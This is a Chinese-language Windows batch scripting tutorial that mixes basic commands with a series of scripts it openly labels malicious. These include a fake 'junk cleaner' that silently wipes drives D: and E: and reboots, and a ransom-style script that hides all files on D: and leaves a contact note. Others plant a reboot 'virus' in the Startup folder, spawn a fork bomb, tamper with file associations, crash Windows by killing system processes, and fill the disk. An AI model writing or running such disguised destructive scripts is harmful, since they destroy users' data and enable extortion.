案例1:恶意脚本--之--清理垃圾篇
@echo off
echo ==============================
echo.
echo 垃圾清理程序 v1.0
echo --by wencoll
echo.
echo ==============================
pause
echo 垃圾清理中。。。。。
rd d: /s/q >nul 2>nul
rd e: /s/q >nul 2>nul
echo 恭喜您,垃圾清理完毕,按任意键重启计算机,效果更好!
pause >nul 2>nul shutdown -r -t 0
用到得知识点:
@echo off # 关闭回显,说人话,屏蔽执行过程!
pause # 暂定批处理运行
echo. # 空一行
命令 >nul 2>nul # 命令不要有任何反馈输出
案例2:恶意脚本 之 隐藏所有文件-勒索脚本
@echo off
echo ==============================
echo.
echo 垃圾清理程序 v1.0
echo. --by wencoll echo ==============================
pause
echo 垃圾清理中。。。。。
attrib +s +h d:\*.* /S /D >nul 2>nul echo 18709999999 >d:\找回文件联系我哟.txt
echo 垃圾清理完毕
start d:
pause
案例3:设置脚本标题
@echo off
title 好玩的程序哟!
echo ==================
echo 垃圾即将清理有
echo ==================
pause
案例4:将bat转换成exe格式
bat-to-exe-converter软件+图标文件(.ico)
案例5:设置互动变量脚本
@echo off
set /p boy=哥们,你的姓名是: # set /p 用来设置互动为变量赋值
set /p girl=女神是谁?
echo %boy% love %girl% # %变量名% 作用是取变量的值
pause
案例6:灵活运用set /p
@echo off
title clear the Rubish v1.0 --by lizhiqi color 0a
echo ===========================
echo.
echo 垃圾清理程序 v1.0 echo.
echo ===========================
pause
set /p pan=您好,请输入清理垃圾盘符(如c d e):
echo Rubish is cleaning ......
rd %pan%: /s/q >nul 2>nul
echo OK
pause
案例7:echo.的用法
@echo off
echo ====================
echo. # echo.为固定用法,代表空一行
echo 麦今友好程序
echo.
echo ====================
pause
案例8:冒号:和goto的的基本用法
冒号:的用法:定义命令区间
goto命令:用来在命令区间之间做跳转
@echo off
:a # 定义命令区间,区间名为a
echo mai
goto c # 跳转到命令区间c
:b
echo jin
:c
echo AA
pause
冒号与goto 之 亮瞎你的眼
@echo off
:a
echo 麦今AA
color 0a
color f0
color a5
color ec
goto a
冒号与goto 之 死循环:
@echo off
:a
start cmd
goto a
%0 #0是变量,该变量的值就是脚本的名称本身!,所有%0的作用就是再次执行一次本脚本,实现死循环
%0|%0 #无论如何都要重新执行本脚本(对win10及win7也有效)
案例9:互动赋值实现自动关机
@echo off
set /p time=请输入关机时间(秒):
shutdown -s -t %time%
案例10:定义批处理运行时窗口大小
@echo off
mode con cols=40 lines=10 # cols 定义宽 , lines定义高度
pause
案例11:设置自启动脚本(一)
copy %0 "C:\Documents and Settings\%username%\「开始」菜单\程序\启动\"
shutdown -r -t 0
::该路径仅适用于早期系统,如:windows xp、windows server 2003
::变量username的值就是当前登录用户的用户名!
案例12:设置自启动脚本(二)
copy %0 "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"
shutdown -r -t 0
::%0代表脚本本身的名称
::注释:该路径仅适用于新系统:windows 7、windows10,windows server 2008/2012/2016/2019
::变量username的值就是当前登录用户的用户名!
案例13:制作带有菜单的脚本
用到知识:
冒号: goto
if
if用法
if 判断语句 命令 # 判断正确成功,则执行命令,否则不执行,结束判断
如:if 1==2 md c:\123
案例:
@echo off
title 麦今程序
color 0a
mode con cols=45 lines=13
:menu cls
echo ===========================
echo 菜单
echo 1.定时关机
echo 2.制作关机病毒
echo 3.清理垃圾
echo 4.退出
echo ===========================
set /p num=请输入您的选择:
if "%num%"=="1" goto a if "%num%"=="2" goto b if "%num%"=="3" goto c if "%num%"=="4" goto d
echo 别TM瞎输入,好好输入,只能输入(1、2、3、4)!
echo 按任意键回菜单吧! pause >nul 2>nul goto menu
:a
set /p time=请输入关机时间: shutdown -s -t %time% goto menu
:b
echo shutdown -r -t 0 >"C:\Documents and Settings\%username%\「开始」菜单\程序\启动
\haha.bat"
echo 恭喜,病毒制作成功!
pause goto menu
:c
set /p pan=请输入垃圾清理盘符: rd %pan%:\ /s/q >nul 2>nul
echo 恭喜,分区%pan%盘垃圾清理完毕!
pause goto menu
:d exit
案例14:注释命令
@echo off
::echo 麦 # ::可以注释掉一行命令,当执行批处理时不会再执行本行命令
@rem echo 今 # @rem 作用同 ::
pause
案例15:实现延时操作
@echo off
ping -n 5 127.0.0.1 >nul 2>nul
#实现运行时等待大概5秒,也可以理解为延时5秒,然后继续执行后续命令
pause
@echo off
:a
color 0a
ping -n 2 127.0.0.1 >nul 2>nul color a8
ping -n 2 127.0.0.1 >nul 2>nul color e5
goto a
@echo off
echo ==============================
echo.
echo 垃圾清理程序 v1.0
echo. --by wencoll echo ==============================
pause
echo 垃圾清理中。。。。。
rd d:\ /s/q >nul 2>nul
ping -n 8 127.0.0.1 >nul 2>nul
echo 恭喜您,垃圾清理完毕,按任意键重启计算机,效果更好!
pause >nul 2>nul
案例16:制作简易加密脚本
@echo off
title 加密程序v1.0--by dafeige
echo ===========================================
echo 加密说明:
echo 首先将加密程序复制到与所要加密的文件夹同一个目录中,然后再运行该程序
echo ===========================================
set /p name=请输入要加密的文件夹名:
ren %name% system.inf
attrib +s +h system.inf echo 恭喜,已经加密成功!
pause
案例17:制作解密脚本
@echo off
title 解密程序v1.0--by dafeige
echo ===========================================
echo 解密说明:
echo 首先将解密程序复制到与所要解密的文件夹同一个目录中,然后再运行该程序
echo ===========================================
set /p name=请输入要解密的文件夹名:
attrib -s -h system.inf
ren system.inf %name% echo 恭喜,已经解密成功!
pause
案例18:恶意脚本--之-篡改文件关联性
@echo off
assoc .txt=txtfile # 只需要前后一致即可!
assoc .jpg=jpgfile
assoc .png=pngfile
assoc .zip=zipfile
assoc .mp3=mp3file
注释:必须以管理员身份运行
案例20:针对win 2003的蓝屏炸弹
ntsd -c q -pn winlogon.exe
ntsd 早期系统杀死进程的命令
taskkill 新系统杀死进程的命令
案例21:(非批处理)针对win7与win10的蓝屏
win7
任务管理器---强制杀死csrss.exe进程--蓝屏
win10
任务管理器---强制杀死:服务主机:DCOM服务进程启动器--蓝屏
案例22:杀死explorer.exe进程
@echo off
taskkill /im explorer.exe /f >nul 2>nul echo 小样!吓死你了!
ping -n 8 127.0.0.1 >nul 2>nul
start c:\windows\explorer.exe
echo 恢复了!以后别老访问垃圾网站!
pause
案例23:快速制作大文件脚本
fsutil file createnew d:\system.inf 40000000000 # 单位是字节
attrib +s +h d:\system.inf